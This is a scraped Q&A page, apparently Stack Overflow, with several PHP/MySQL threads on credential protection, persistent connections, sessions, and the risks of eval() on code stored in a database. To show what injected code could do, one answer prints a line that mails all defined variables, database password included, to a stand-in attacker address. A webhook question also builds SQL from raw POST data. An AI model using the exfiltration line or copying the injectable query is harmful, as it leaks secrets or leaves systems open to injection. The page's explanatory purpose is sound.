Database security from my client - php

I am to deliver a PHP application to my client, but I don't want to share the database credentials with him. I only want the database to be accessible via my application and by no other means possible.
However, if I submit the PHP code, they can view the database credentials in database connectivity script and access the database from outside the script.
How can I possibly stop them to have database username and password as their is no "compiled" code?
EDIT: The application and database are on two different servers.. i.e. app uses remote database connection, and runs on client's server database is on my own server.

I don't want to share the database credentials with him.
If they have access to the client connecting to the DB, you have to. Otherwise, by definition, credentialed access would be impossible.
However you obfuscate the connection phase, once the connection is established anyone with access to the source code may hijack it however s/he desires. I don't think that even encrypting the whole modeling class would be enough.
This is particularly evident using the deprecated MySQL functions: once a connection is established, any other part of the code may issue a query and have it executed in the context of the connection, with no longer any need to know the credentials. But unless you do things very carefully (and, I suspect, depending on the attacker's ability, even if you do), the same will hold true with mysqli, PDO, and so on.
What you can do is:
limit privileges on the database to the barest possible minimum. This should always be done, BTW, because you never know what vulnerabilities might be in some code, yours or somebody else's that's connected to yours (libraries, plugins, ...), and who could thence gain access to the application.
limit connection IP to that of the client. Another thing you should always do whenever practical: there's no reason not to.
move whatever is possible to move into stored procedures and functions.
If you want (and really need) even more control, you need more work:
instead of using prepared statements (and, BTW, you will now have to have "static" statements - you won't be able to prepare, say, SELECT {$field} FROM table WHERE id = ? and bind it to id), move the statements themselves
to a thin layer on the database server, passing parameters via (e.g.) JSON.
So what was, say,
SQLExec("SELECT * FROM users WHERE userid = ?", "1")
can become very easily
HTTPExec("SELECT * FROM users WHERE userid = ?", 1);
but now, on the server (you'll need a HTTP server there), a script will verify that the requested query is indeed among the approved queries; and only if so, execute it and return the results. Depending on several factors, you might even be able to pass this as a "performance improvement". On the other hand, the "database" server is now more loaded.
Now the client cannot issue a "DROP TABLE Students;" statement, because this statement is not among the approved statement list.
To generate the approved statement list, you can instruct the server to approve everything and store the queries it receives; you then do an exhaustive review of all the web app, in order to trigger all queries at least once (you probably have a test integration script that already does this, and verifies that results are OK); when you've finished, all the queries just received, and only those, will be considered "valid".
Someone changes a comma in one of the queries in the client code -- and the server will reject the query as unauthorized.
This is in the end equivalent to moving (or duplicating) the relevant application code onto your server, so there might be issues: in effect, you're no longer giving your client the full application.
(At that point you could even replace all the queries in the client code with their, say, MD5 hash. The server does not really execute the SQL sent by the client anyway, it executes the good copy that's present server side for comparison purposes. So sending the query or its MD5 signature is perfectly equivalent).

You could ioncube the config file that you store the database connection information in. You can upload single files for free.
http://www.ioncube.com/online_encoder.php

Related

Minimizing MYSQL connection from webhook callback

I am working on a project that requires my server xyz.com to receive POST/GET responses to xyz.com/callback.php from abc.com(SMS gateway providers).
Below is how i currently handle the responses on callback.php
1. Receive the POST data from abc.com (This post contains a unique ID)
2. Connect to mysql database and UPDATE users WHERE messageId=Same_ID_from_POST_data
This works and data is being updated. However it is causing CPU overload due to the thousands of MYSQL connections. This is because whenever there is a delivery receipt from the api server for each individual message, callback.php connects to mysql and updates the database.
Is there a best practice to minimize the amount of times i connect to MYSQL?
I was thinking of doing the following, i however doubt if it makes any sense.
1. Receive post data from api server as before.
2. Instead of updating mysql, i simply write to a .txt file with the following code
$query.="Update users set status='$post_data_for_status' where unique='$post_unique';
Then after about 10mins i use cron to run a php file that uses mysqli_multi_query($connection, $query) to update the table thereby making it a single connection. After the update i simply unlink the .txt file
Even if the above method will work, i don't know how to do it. I am sure there is a better alternative.
Any ideas please and sorry for long epistle.
What you are looking for sounds like avoiding connection churning, which is one of the benefits we get from using a "connection pool", commonly used in Java/J2EE web applications.
PHP doesn't provide connection pooling (AFAIK). But PDO and mysqli do provide for "persistent" connections, which give some of the same benefit as connection pool (avoiding connection churning.)
For mysqli, prepend "p:" to the hostname in the mysqli_connect.
http://php.net/manual/en/mysqli.persistconns.php
For PDO, include PDO::ATTR_PERSISTENT => true in the connection.
http://php.net/manual/en/pdo.connections.php
Be aware that with persisted connections, the MySQL connection maintains it's state (session variables, temporary tables, user defined variables, et al.) For example, if a client issues a statement such as SET time_zone = '+00:00'; or SET #foo = 'bar';, a subsequent client reusing that MySQL connection is going to inherit the time_zone setting or the user defined variable #foo value; whatever changes to the MySQL session state the previous clients made.

MySQL Variables PHP COnnections

I'm using a PHP web application to connect to MySQL, what I would like to do is set the userID of the client who has logged in and then use that MySQL variables within views and functions to limit data returned.
Currently, I'm simply using:-
SET #UserID = 3;
And then referencing this within views/functions.
Is this a suitable and reliable method to do this across multiple concurrent user sessions? Will this be present for the lifetime of that users MySQL connection (or page load) from PHP and I obviously want to ensure no other connections leverage this. It's set on every page load (or MySQL reconnection from my app).
Thanks all!
As it clearly states in the first paragraph of the mysql variables man page: http://dev.mysql.com/doc/refman/5.0/en/user-variables.html
User-defined variables are session-specific. That is, a user variable defined by one client cannot be seen or used by other clients. All variables for a given client session are automatically freed when that client exits.
e.g. they exist while the php<->mysql connection is kept alive, PER connection, and automatically removed when the connection is closed/terminated. Unless you're using persistent connections in PHP (which you shouldn't be anyways), the mysql variables would basically exist for the life of that particular script invocation, and will NOT be available when the same user comes back with another http request later.
So, strictly speaking, what you're doing shouldn't be a problem (each PHP connection exists more-or-less independantly). But, that said, it isn't the best approach.
I think you've got a "if all you have is a hammer, everything looks like a nail" problem. MySQL is not designed with the request lifecycle in mind, and it shouldn't need to be aware of it. PHP, on the other hand, is designed with exactly that idea.
Instead of:
mysqli_query('Set #UserID=' . $id);
$output = mysqli_query('SELECT * FROM FOO WHERE ID=#UserID');
Why not just use bound variables?

using mysql to track sessions instead of trusting the server?

Some context...skip to the bottom for question if you are impatient...
I am trying to limit access to four pages on my (future) website to users with a valid username and password pair. To this end, I have a simple PHP/HTML form...in my PHP/HTML form the client types in a username and password, hits 'submit'...the data goes to POST and another PHP script validates the user/passwd pair by using a SELECT in my mySQL database...
userpassword table:
uid (PRIMARY KEY,INT), username (varchar 32), password (char 128)
If the match works then it looks up the access table to see what page that particular username has access to (1 for access, 0 for no access):
useraccess table:
uid (PRIMARY KEY,INT), securename0(TINYINT), securepage1(TINYINT)...
The PHP script then prints out links to the secure pages they have access to. If I understand them correctly, the articles and books I have read state that you normally store a cookie on the client side with a session ID that points to a session file on server that stores the username/password pair and whatever other session variables until it either times out or the user logs out.
I don't want to spend the money for a dedicated server. So all that PHP session info is saved all lumped together on the server, along with the other half dozen websites from other customers running on it. This strikes me as horribly insecure...
The question is...would it be any more secure to circumvent all that and store/track the per-user session information in my own mySQL table? ie. something like this:
session table:
sessionkey (PRIMARYKEY, CHAR(128)), uid(INT), expiretimedate(DATETIME), accesstosecurepage0 (TINYINT), accesstosecurepage1(TINYINT)...
So when a user hits any "secure" page it would check their session id cookie (if present) and then do a SELECT on the session table to see if that particular "sessionkey" is present, then give them access depending on what accesstosecurepage0,1,2,etc. are set to.
Would this work better than the alternative or am I wasting my time?
This question is about as old as sessions themselves, although possibly for slightly different reasons than yours. Security is not the issue, as session hijacking occurs when someone gets hold of a user's session ID and sends that to the server. Therefore, using a database to store session data is as insecure as using a file on the machine - it essentially amounts to the same thing.
Database sessions tend to be used when multiple servers are required to host one site, or sessions need to be stored across different but related domains. However, it is considerably more work to set this up from scratch, if not using a pre-built framework.
If you don't need this functionality then using the standard session should be adequate.
I don't see this making your application any more secure. Session hijacking occurs when someone retrieves another user's session ID and pretends to be them. Your session table would not prevent this from happening. (I skipped to the bottom btw, hope I didn't miss any important details:)
It might even make it less secure since you are now giving hijackers two ways to steal session data: One through the file system and one through the DB. As to which one is more secure over the other, I'm not too sure, but I would think it depends on well you secure either one yourself.
Potentially more secure, yes -- after all, shared hosting is an infamous target for exactly the kind of security breaches you fear but, once again, the MySQL server is shared and accessible by other users just like all other resources so, worst case scenario, the damage is exactly the same.
The efficiency hit, however, would probably be unbearable and would almost certainly mitigate the extra peace of mind. To avoid the use of sessions or similar mechanisms completely, you wouldn't even have an easy way to cache the db results and a query per page load, per person - an unnecessary query - may well prove unacceptable.
Not to mention, you're replacing one class of vulnerability with a whole new one in the form of SQL injection.

Is storing PHP code in a database, and eval()ing it at runtime, insecure?

I've built a program that stores, retrieves, and eval()s code from a SQLite database.
Before I get jumped for my bad coding practices, let's just treat this as a theoretical and pretend that I have a good reason for doing so.
All other considerations aside, and assuming that user input is not a factor, is there a security risk inherent in storing PHP code in a DB and running it with eval()?
Clarifications:
I am not eval()ing user-submitted content.
The SQLite DB file is in the same directory, and has the same security applied to it, as the rest of my files.
Please no comments on performance, caching, etc. I'm aware of all that.
eval() in itself is not inscure. It's just bad practice, unclear and opens up for a whole bunch of bugs and security related issues.
Even if user-submitted data isn't being stored in your database, you're still providing a way to have code stored in the database be executed even if you didn't put that code there. If someone were to gain access to your database server, they could potentially do worse things than drop your database by modifying the code it stores, like deleting any files that the PHP script has write access to.
Yes. If I can inject something into your database then I could possibly execute it on your server through the eval.
Are you trying to use the database as a hashtable of functions? So you can call a piece of code depending on some key evaluation. The security problem I see here, is the database may have other API exposed somewhere to populate it. Without you knowing/explicitly doing it, some key,value pair may be introduced in the database. If you used a hashtable of function instead, someone need to make a commit in your code repository to change a function. So now you need to protect the DB as good as your code's repository.
You're letting the database run any PHP code it wants as whatever user the PHP is running as. Of course this is insecure.
eval() is not inherently insecure. But it's secure only as far as the code it evaluates is safe. So we could come up with an example of code that does something bad, suppose that there's some way that code got stored in your database, and boom.
Code that is stored elsewhere is not part of your project, not code-reviewed, not tracked in git, and not unit-tested. The code is basically not evaluated from a security perspective, so there's no assurance of security. In other words, from a Quality Assurance perspective, it's a weak quality plan, since code security is part of code quality.
Anyone with access to your database can modify code, and then that code is executed, I assume without any review. The code has no access restrictions; it can reference and even modify variables within the application that calls it. So the question is how is the code in your database changed? Who has access? What is the code review process? What is the testing process?
In addition to SQL injection that could change the PHP code in the database illicitly, there's also the security of whatever authentication you use for users before they can make authorized changes to the code. I'm supposing your app has some interface for changing code in the database through a web interface.
You asked for evidence, by which I guess you want an example of code that could do something bad if it were evaluated.
If I can arrange for something like the following code to be stored in your database, and eval() that code, I can get a lot of information about your application. E.g. your database password, your authentication methods, the version of the framework you use... all sorts of things.
mail('attacker#example.com', 'Mwa ha ha', print_r(get_defined_vars(), true));
There are similar functions like get_defined_functions() too. Or even return its own source code with open(__FILE__). An attacker can quickly learn where there are other exploitable security holes in your code.
And then there are various ways PHP code can get information about your server, or make changes to your server. Combine eval() with code that uses exec() and you can run any command on the server. At least it's running under the uid the http server runs as -- which I hope is not root.

keeping db connection active across pages

I'm a learner. Is there a way to stay connected in to the mysql database as the user is taken to the next page.
For example, the db connection is made, the user is logged in, and then goes to the next page to access a table in the database. Instead of having to make the db connection again, is there a way to keep the previous connection active?
Or does it matter at all in a low-traffic site?
I read a post yesterday about something related to sessions, and the responder talked about sending a "header-type" (?) file.
Thank you.
Yes and no. Once the user goes to the next page, for all intents and purposes they are not connected to the database anymore.
Your script (on the next page) will still need to open the connection for them. mysql_pconnect() will ensure the actual connection they used is still available when they want it next, however, it can also cause excess number of apache/mysql connections to wait around uselessly.
I'd strongly suggest not using it unless your benchmarks show that it provides a significant gain in performance. Typically, for most applications (especially when you're learning), I would not bother with persistent connections. Note the warning in the PHP Manual
it wont matter unless you're getting a ton of requests, but php has a mysql_pconnect (pconnect) for persistent connections to mysql. each instance of apache will keep around an active connection to mysql that can be used without reconnecting.
I believe you're looking for something like mysql_pconnect(), which establishes a persistent connection to the database.
I realy cant understand your question, if you have fetched datas from db you usualy do some stuff with it. And if you want fetch data from db you do usualy this points.
Some Framworks and Library makes this points a bit easiyer.
Here is the usual way of the process.
1. Make connection to the db.
2. Select a db.
3. Send a query to db.
4. Fetch the results.
5. Do some funy stuff with it.

Categories